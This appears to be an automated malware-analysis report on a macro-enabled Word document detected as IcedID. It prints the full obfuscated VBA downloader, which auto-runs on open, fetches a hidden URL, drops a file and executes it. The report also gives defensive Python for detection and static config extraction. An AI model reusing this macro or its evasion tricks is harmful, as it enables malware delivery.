Verdict: MALICIOUS
Risk score: 230
Heuristics (6)

- ClamAV: Doc.Macro.ICEID1020-9781212-0 [critical, CLAMAV_DETECTION]
  ClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
- VBA project inside OOXML [medium, OOXML_VBA, 3 related findings]
  The document contains a VBA project (VBA macros present).
- CreateObject call [high, OLE_VBA_CREATEOBJ]
  Matched line in script:
  Set xqWBo = CreateObject("Script" + rvsjD)
  The ProgID is assembled at runtime from "Script" and the default argument "ing.FileSystemObject" (see ZoSTL in the extracted source), which defeats a signature on the literal "Scripting.FileSystemObject" but not a token match on CreateObject itself; the macro uses the same trick for "ws" + "cript.shell" in KHQmw.
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]
  Triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; the pairing is what flags p-code-only or source-extraction-failure macro documents, where the visible VBA source is unavailable. In this sample the source did extract (see macros.bas below) and the pair is plainly visible: Sub AutoOpen, CreateObject and MSXML2.serverXMLHTTP.
- AutoOpen macro [low, OLE_VBA_AUTOOPEN]
  Matched line in script:
  Sub AutoOpen()
- Embedded URL [info, EMBEDDED_URL]
  One or more URLs were extracted from the document. A URL by itself is not a detection; the per-URL label names the channel (macro, JS, link annotation, document body, ...) that reached it. All 28 URLs below were found in document text (OOXML body / shared strings). They are XML namespace URIs from the package's own markup, typical of a document saved by a recent Word version, and none of them is a network indicator. The macro's actual download URL does not appear in this list because it is stored reversed inside a shape's alternative text and is only assembled at runtime (see BRotJ and IPSxZ in the extracted source).
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.microsoft.com/office/drawing/2014/chartex
  - http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
  - http://schemas.microsoft.com/office/drawing/2015/10/21/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/9/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/10/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/11/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/12/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/13/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/14/chartex
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.microsoft.com/office/drawing/2016/ink
  - http://schemas.microsoft.com/office/drawing/2017/model3d
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2012/wordml
  - http://schemas.microsoft.com/office/word/2018/wordml/cex
  - http://schemas.microsoft.com/office/word/2016/wordml/cid
  - http://schemas.microsoft.com/office/word/2018/wordml
  - http://schemas.microsoft.com/office/word/2015/wordml/symex
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
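The OLE_VBA_PCODE_AUTOEXEC_EXEC rule above is a co-occurrence test, not a signature on any single string. The Python below is an added illustration of that logic written for this page; it is not the analyzer's own implementation and not oletools code. It looks for each token in a raw stream in both ASCII and UTF-16LE form (an assumption about how identifiers and string literals surface in module and cache streams) and reports a hit only when an auto-exec entry point and an execution token are both present. The streams it runs over are constructed byte strings modelled on lines from the extracted source, not the real vbaProject.bin.

```python
import re

# Token lists exactly as the OLE_VBA_PCODE_AUTOEXEC_EXEC description gives them.
AUTOEXEC_TOKENS = ("Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open",
                   "Auto_Close", "AutoClose")
EXEC_TOKENS = ("Shell", "CreateObject", "GetObject", "PowerShell", "cmd.exe",
               "URLDownloadToFile", "WinHttp", "XMLHTTP", "ADODB.Stream",
               "ShellExecute", "ExecuteExcel4Macro")


def _compile(tokens):
    """One case-insensitive pattern per token, matching it either as plain
    ASCII or as UTF-16LE (every byte followed by NUL). Assumption: those are
    the two encodings in which names appear in VBA module/cache streams."""
    compiled = []
    for tok in tokens:
        raw = tok.encode("ascii")
        ascii_form = re.escape(raw)
        utf16_form = b"".join(re.escape(bytes([b])) + b"\x00" for b in raw)
        pattern = re.compile(b"(?:" + ascii_form + b"|" + utf16_form + b")",
                             re.IGNORECASE)
        compiled.append((tok, pattern))
    return compiled


_AUTOEXEC = _compile(AUTOEXEC_TOKENS)
_EXEC = _compile(EXEC_TOKENS)


def pcode_autoexec_exec(stream: bytes):
    """Apply the heuristic to one raw stream.

    Returns {'autoexec': [...], 'exec': [...]} with the matched token names
    only when at least one token from EACH list is present; otherwise None.
    It is a token-level test: it ignores what CreateObject is called with, so
    splitting a ProgID into "Script" + "ing.FileSystemObject" does not hide it.
    """
    auto = [name for name, pat in _AUTOEXEC if pat.search(stream)]
    exe = [name for name, pat in _EXEC if pat.search(stream)]
    if auto and exe:
        return {"autoexec": auto, "exec": exe}
    return None


# Constructed stand-ins for module streams (not the real vbaProject.bin):
# a mix of ASCII and UTF-16LE fragments modelled on the extracted source.
STREAM_LIKE_SAMPLE = (
    b"\x01\x16\x03\x00"
    + b"Sub AutoOpen()\x00"
    + b'Set xqWBo = CreateObject("Script" + rvsjD)\x00'
    + "MSXML2.serverXMLHTTP".encode("utf-16-le")
)
STREAM_AUTOOPEN_ONLY = b'Sub AutoOpen()\r\nMsgBox "hello"\r\nEnd Sub'
STREAM_CREATEOBJ_ONLY = b'Set fso = CreateObject("Scripting.FileSystemObject")'

if __name__ == "__main__":
    for label, data in (("sample-like", STREAM_LIKE_SAMPLE),
                        ("autoopen-only", STREAM_AUTOOPEN_ONLY),
                        ("createobject-only", STREAM_CREATEOBJ_ONLY)):
        print(label, "->", pcode_autoexec_exec(data))
```

Because the rule works on tokens rather than on ProgIDs, the sample's "Script" + rvsjD concatenation does not help it: CreateObject is still present, and so is serverXMLHTTP. The price is that any macro with an AutoOpen that also creates, say, a Scripting.Dictionary fires the same way, so treat the finding as a triage signal rather than a verdict.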
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 12375 bytes | 5e71660f04a15bc9aff61d2dd012d6130a3c918841602d10f5e21598e242bc1b |

Preview of macros.bas (first 1,000 lines of the extracted script, reproduced verbatim; the random-word comment lines are the sample's own padding):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "qlBCv"
Sub ZoSTL(VWjFm, Optional ByVal MJvtv As String = "c:\programdata\LhkyR.txt", Optional ByVal rvsjD As String = "ing.FileSystemObject")
' Tilt obsequiously placental anaphora intransitive
' Funnel trimmings gated maidservants miserable
' Crooned lazaret germanium
' Frustration expedience
' Interacted shelled
' Deaf earnings
' Piquant mackintoshes
' Stereographic
' Swans
' Billposters marbled lemming
' Ensconced polishing postmistress eigenstates emanate
' Fourteenth prouder heathland waggly
' Chevron conquests raising otherness
' Mansions lending
Set xqWBo = CreateObject("Script" + rvsjD)
' Pinups unashamed slider slung modernise
' Dynamited hardest
' Libeller postoperative
' Thermostats barked plagues carbuncles youngish
Set qylSM = xqWBo.CreateTextFile(MJvtv)
' Beef oxidant tumbledown hardwoods irritability pianola wagons
' Blunders cluster gain delicious
' Fondest epoch rudely disrepair
' Issues newsreader elk
' Transformative rockers dumpling hopelessly demolisher
qylSM.WriteLine VWjFm
' Taverns gentiles swamps
' Environ befoul cardinals
' Baronesses relinquished
' Unbending tarty
' Court mouldings
' Holidaying
' Thirds hustles ignorantly trellis fealty
' Wrung syndicate showier uproots anaesthetic
qylSM.Close
' Incidences
' Liabilities auks translator afflicts undisguised
' Misdoing deafer
' Farce
' Doorstep geneticist musketeers regarded
' Sneering listeria cobblestones antiquary
' Concerned porphyry urbanely
' Worms lingered attests spicer dishonest
' Butchered weird microcosm
' Selfinflicted reformist duplicated
' Recto thereon fingermarks unconfirmed
' Manacles chase
' Consider
' Ignoramuses
' Gentlemen diseased
' Squats
' Melanomas infers stirrers
' Factorials efficacious immutable
' Furring
' Culminate microprogram wittering
' Interview alluding sonic
' Diagonal accordingly
' Hyperinflation dew
' Muds smith idolisation ebb parenthetical
' Lulls pampered uncomfortableness permit
' Riffs skinflint occupant blowtorch callgirl
' Raincloud bisons silvering fatted depots
' Transformed questing quadratically
' Greaseproof hazardous biting giggling
' Outmanoeuvred jawbone chemicals unamended
' Womanise misconduct triptych
' Testdrive allurement
' Medal esoterically cowling immersing
' Workspace spiny
' Burners lobster marshiest massing reconstitution
' Wrestlers infrared examination tablets
' Constructing discredited sententiously navigated
' Foramen brayed duffel redneck
' Lesotho ahead exwives pinch grabs fruity
End Sub
' Mistranslating addition coping
' Organisation caliph ridge basreliefs improving
' Hyperbolic
' Dismounted prism
' Neon deerstalking conquers damper
' Leggings flameproof
Sub AutoOpen()
' Dioptres
' Expressible brisker
' Sucker vivisection
' Venue henchmen cannoning
' Stubble machetes seceding
' Shallot poorer fryers
' Couscous drugged untrusty shined
' Altruistically outraged
' Convects sacraments dublin
' Piratical direct acclimatise
' Epigones windfall
' Exalt
' Overleaf pustule grout scheduled
' Penguins wineglass abutted blubbering supermarkets
' Sightseers
' Coiled repacking
' Fluoresce thirty
' Ultramontane melodic menial
' Emboss agriculturalists myalgic inkiest cigars
' Parodies excursion
' Transgressor skill resided solitude remove
' Sneaking bridging
' Aeons silt maturer
' Crumpet solve hooter orator
' Mobilities relativism perturbed bellows duckboards
' Innovative liaise glisten repopulate officialdom blouse
' Rubbishes censoriousness monotonously
' Stargazing
' Pavlov cagiest memories refractors
' Sphygmomanometer spoiling controverted strayed uninvented
' Striding mists
Dim mUZrT As New UqPjU
' Jumper nieces glimmerings stayers
' Syndicalism abyssal
' Slating attempts
' Boasting discontent ferocity
VWjFm = mUZrT.BRotJ("MSXML2.serverXMLHTTP")
' Disputable
' Equanimity displayed fruitfulness
' Unaffectedly tabulating
' Rescaled unmerited counterattacks sensitised
' Uncompromising rearward bawdiest
' Graced scarier
ZoSTL AzDRk(VWjFm)
' Triangulation crewmen rationed tropes
' Separator iceskate gatekeeper
' Foment crinkle dynamited
' Snappier admired hobo dissenter
' Voyeuristic clanging
' Cards improved
' Throatiest epicentre reopen boundedness
' Whiles apricots forgers squeezed
' Nucleus eyewitnesses international reunified
' Bruiser barnstorming repents orbits
' Additions lion symmetric
' Fateful examined
KHQmw IPSxZ(0) + "vr32 c:\programdata\LhkyR.txt", "ws"
End Sub
Function uvSyV(gUtUq, bzQFz)
' Enviable achieve conifers synchronises
' Bungee outflanked
' Bartering plated households feminism instilling
' Gaffes hutches salaam discrepancies footballs superstore
' Consisted corpuscular
' Circumferences bedridden senegal shoplift roguery
' Bogeyman burst degraded explicate discover
' Enclosing surreys shabbily
uvSyV = Split(gUtUq, bzQFz)
End Function
Attribute VB_Name = "gvXzI"
' Native qualifications headdresses
' Speechless ploughmen toothbrush
' Unbuckled muzzles angel
' Xenophobic avowedly laser detaches nationalism
' Archenemy tweeter hikes previewing
' Dodged
Function AzDRk(UITDm)
' Respect torrential ossification
' Banging
' Various tonsure gainsay deems
' Raindrops dreamers downpipes
' Thebes storming
' Dozes ingenious landmarks formated unmentioned
' Tonsillitis bakers bus
' Lone appropriately backbone corporeal
AzDRk = StrConv(UITDm, vbUnicode)
' Affidavits paraphrased madrigals cupolas berth
' Homelands prostrating chat
' Badge moo dorsally nullifies
' Bakehouse sauerkraut withdrawing adorably
' Bestows plums cripple neologisms obstacles campanological
' Unpronounceable disintegrates
' Dictum stapler topheavy magnesium
' Coined curving novel undiscovered spectroscope cradles wee
End Function
' Converts understatement
' Micrometers reconsiders
' Octagon peoples overspend
' Pterodactyl
' Broccoli
Function nEDVs()
' Misanthropic beermat
' Enhances
' Sepulchral severally possibilities transporting
' Paints electromagnetically reflexology diagrammatically
' Haha phosphors cabinet minxes
' Thunderclaps cellars reimposed
' Intrusiveness bestiality defamed
' Informatively callup jewels
' Leniency synovial fervently smothers resilient wonderland
' Upbringing comer
' Leprosy ratifies kitchens
' Disclaimers deactivate kiddie address
With ActiveDocument.shapes(1)
nEDVs = .AlternativeText
End With
End Function
' Fascist absurdest insulators
' Emended coo
' Eurydice batched rubidium
' Premiere aquanaut victors quit telegraph
' Essentialism discrediting weaponry wildest
Function IPSxZ(oAxhP)
' Holiness complies hardiest baldy byelections ugandan unchallenged
' Relationships morosely streetwalkers assault
' Subtypes
' Organs guilders leeway
' Convulsed citation
' Brunch sling physiology lactate engravers
' Gatehouses singalong principality
' Carbonated entangle deceit teachers
' Alliterated hoverer sabotaged
' Correctness anonymously fastidious
' Kiosks
UhXyG = nEDVs()
oCphP = uvSyV(UhXyG, "###")
gSuZJ = oCphP(oAxhP)
IPSxZ = gSuZJ
End Function
Attribute VB_Name = "UqPjU"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Reverse(Text)
Dim i As Integer
Dim StrNew As String
Dim strOld As String
strOld = Trim(Text)
For i = 1 To Len(strOld)
StrNew = Mid(strOld, i, 1) & StrNew
Next i
Reverse = StrNew
End Function
' Rakish floodlights midflight
' Scrooges
' Stammers each mystical
' Mackintoshes redemptions brings incredibly
' Ark beforehand
' Twisting rocksolid coalblack who bubbliest
Function BRotJ(UjuHE)
' Shadier livened routes ganglionic
' Highwaymen strongmen degrade
' Bluntness enriches specifier
' Glimpsing freedom
Dim FqTCS As Object
' Playfully dimples
' Cicero caterpillar masqueraded spinnaker
' Mesozoic blazing sheepishly
' Glaciers unfruitful repudiated
' Bastardy comet caretakers
' Skinny sleigh blushers
' Tallest bravely serpents ombudsmen moored
' Rectifier dilator presentiments dreamers
' Sunless preponderantly vow
Set FqTCS = CreateObject(UjuHE)
' Humanoids beachcomber wilful
' Temples descriptively pursuant
' Fee
' Corporate malignant chalet drowses
' Overreact comedians wafts bands
' Ignominy teem
' Nor quadripartite dabs majesty storages
' Permission
' Unmentionable krypton
' Conformation
' Illiquid
' Lemon fussiness gravitation
' Invalidates ignominious
' Brawl despising unenthusiastically
' Eternity roundly
' Lyons quaffed planetoids
' Intuitionist midweek covets
' Filmed trigs asperity sunning
' Oafs apnea bystanders
' Randomised comparable wanted hubcap coached
' Disapprobation scurry emasculated werewolves permanent conceivable
' Mills punished unparodied brunei crammer
znECo = IPSxZ(1)
' Oft puppets folders
' Professing alienation legible ebbs
' Patchy tarantula viceroys
' Various lunches
' Amnesties wales befuddling
FqTCS.Open "GET", Reverse(znECo), False
' Gauche corroborate studiousness inviolable uninterrupted
' Prosecuted ricksha
' Honeysuckles cheekier metropolitan punchy
' Footnotes reverses smokeless smothered
' Trigonometric bitten
' Lighter glossier prerogative
FqTCS.Send
' Palimpsest unsigned
' Carp deadpan
' Grandpas unblocked entree gland
' Anagrammatically stacked charm wavier unbroken
' Lls keenness greasing
' Scrummage marshalled aligning milieu
' Incense miser comfy habitually
' Armaments shorn tossup meringues
BRotJ = FqTCS.responsebody
End Function
Attribute VB_Name = "GgTNR"
Sub KHQmw(UrxLK, PpJwG)
' Profanity forges apprentice transgression coachman
' Neurosurgery
' Exclusions product founder babbled
' Revels heartland
' Tripled jamaica mounties
' Irreproachably herd associational ospreys
Set OJyfX = CreateObject(PpJwG + "cript.shell")
' Puller purifier
' Actionable dermatologist berk punning
' Perturbation raster
' Clouded putrefy iglu
' Unfertilised adjusted sustain
' Divide backstairs
' Expostulation
' Snare endometrial caseloads dioptre
' Screamer renegotiated conman reeds
' Illness preparing cladding
' Tenacity naturalism doomsday craftier acquits
' Fragrant benefactor buffs
' Pancreatic tatty messaging
' Misogyny merchantman endive misfire hornbeam
' Developments minorities
' Recanting
' Feebleness crossfertilisation
' Populations thorniest explorers irritable
' Partnering disinclination sinuous trumpet
' Woollen leukemia
' Lose conductive inauguration dallas reminiscently
' Metals intending governorships
' Antiquity
' Bigamist
' Enquirers compressibility maimed innumeracy
' Gritted fluttered kinsfolk jiffy detrimentally uncommon
' Placer scolded inevitably percutaneous
' Fluctuation
' Highways matings inverters
' Bloodstained controverted softie
' Therapeutic thrash tritium knocks orca
' Malingering involvements
' Stuffing hocus whirlpool geniality
' Sailed adulteress progeny overdubbing gadding
' Episcopal symphonists fared abroad compilers depicted
' Dday bauxite biochemically
' Peerage sync demobs
' Gladdening strenuously offered
' Spiritualist mingling rhetoric
' Undercut empiricists
' Bathhouse
' Meatpie tugs gratification dukes franchised
' Mags crunches
' Affecting mulled apothecaries mailable throbs
' Tonelessly quarried dock
' Aiming brew exultation
' Relatedness wicketkeeping torsion tunnellers
' Connectors extras manipulation
' Urologist trifle
' Inexcusably ergonomic
' Acceptances religion octopus juicy immerses
' Mandarins proximally emollient downplay
' Bottoms will
' Response nick gigantically expressions fang bits
' Precarious martyrs floorspace impressionistic
OJyfX.exec UrxLK
' Quaff
' Offender
' Tittering overtakers naps
' Nunneries shoguns gift nothingness icons
' Thuggish inaudible lustrous quashed
End Sub
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 46080 bytes | bb264cef47d824613a963d4cf59ad3b4a51ef8d157e2b963343991013fa04b37 |
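Read top-down, the preview describes one chain started by AutoOpen: BRotJ creates MSXML2.serverXMLHTTP and fetches the URL returned by IPSxZ(1), which is field 1 of ActiveDocument.Shapes(1).AlternativeText split on "###" and passed through Reverse; ZoSTL runs the response body through StrConv(..., vbUnicode) and writes it to c:\programdata\LhkyR.txt with Scripting.FileSystemObject; KHQmw then hands IPSxZ(0) + "vr32 c:\programdata\LhkyR.txt" to WScript.Shell.Exec. The shape's alt text is therefore the configuration, and it is not reproduced in this report, so neither the URL nor the command prefix is known from this page alone. The Python below is an added example for this page, not code from the report or from the sample: it pulls shape alt text out of the document XML and repeats the macro's split, reverse and concatenate steps on the analyst's side, without running any VBA. It assumes the shape is a DrawingML inline, whose alt text lives in the descr attribute of wp:docPr (a VML shape would carry it in v:shape alt instead). The docx and the alt text it runs over are constructed placeholders.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import quoteattr

# Namespace of wp:docPr; its "descr" attribute is what
# ActiveDocument.Shapes(n).AlternativeText returns for a DrawingML shape.
WP_NS = "http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"

# Values copied from the extracted macro (ZoSTL default argument and the
# KHQmw call inside AutoOpen).
DROP_PATH = r"c:\programdata\LhkyR.txt"
CMD_SUFFIX = "vr32 " + DROP_PATH
SEPARATOR = "###"


def build_constructed_docx(alt_text: str) -> bytes:
    """Build a minimal docx-shaped zip in memory whose first drawing carries
    the given alt text. Constructed stand-in for the real sample."""
    document_xml = (
        f'<w:document xmlns:w="{W_NS}" xmlns:wp="{WP_NS}"><w:body><w:p><w:r>'
        f'<w:drawing><wp:inline><wp:docPr id="1" name="Shape 1" '
        f'descr={quoteattr(alt_text)}/></wp:inline></w:drawing>'
        f'</w:r></w:p></w:body></w:document>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", document_xml)
    return buf.getvalue()


def shape_alt_texts(docx_bytes: bytes) -> list:
    """Alt text of every DrawingML shape in word/document.xml, in document
    order (index 0 corresponds to Shapes(1) in VBA)."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        root = ET.fromstring(z.read("word/document.xml"))
    return [el.get("descr", "") for el in root.iter(f"{{{WP_NS}}}docPr")]


def decode_macro_config(alt_text: str) -> dict:
    """Repeat the IPSxZ / BRotJ / KHQmw string handling: split on '###',
    field 1 reversed is the download URL, field 0 prefixes the command that
    runs the dropped file."""
    fields = alt_text.split(SEPARATOR)
    if len(fields) < 2:
        raise ValueError("alt text does not carry the expected '###' fields")
    return {
        "url": fields[1].strip()[::-1],      # Reverse(Trim(IPSxZ(1))) in BRotJ
        "drop_path": DROP_PATH,              # CreateTextFile target in ZoSTL
        "command": fields[0] + CMD_SUFFIX,   # KHQmw IPSxZ(0) + "vr32 ..."
    }


def analyse(docx_bytes: bytes) -> dict:
    """Configuration the macro would act on, recovered statically."""
    return decode_macro_config(shape_alt_texts(docx_bytes)[0])


# Constructed alt text: a placeholder prefix and a reversed placeholder URL.
# The real sample's alt text is not in the report.
CONSTRUCTED_ALT_TEXT = "PREFIX###" + "http://example.invalid/payload"[::-1]

if __name__ == "__main__":
    print(analyse(build_constructed_docx(CONSTRUCTED_ALT_TEXT)))
```

On a real sample, feed open(path, "rb").read() to analyse() and read the URL and command off the result; nothing in the document is executed, and the same split/reverse logic applies to any document whose macro reads its configuration from shape alt text the way this one does.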
Detection
- ClamAV: Doc.Macro.ICEID1020-9781212-0
- Obfuscation or payload: unlikely (automated rating)

The "unlikely" rating is contradicted by the extracted source. The modules are padded with hundreds of random-word comment lines, the ProgIDs are built from concatenated fragments ("Script" + "ing.FileSystemObject", "ws" + "cript.shell"), the download URL is kept reversed in the first shape's alternative text and recovered with Split(..., "###") and a Reverse routine, and the HTTP response body is written to c:\programdata\LhkyR.txt before being passed to a command ending in "vr32". Treat the sample as an obfuscated downloader with an external second stage.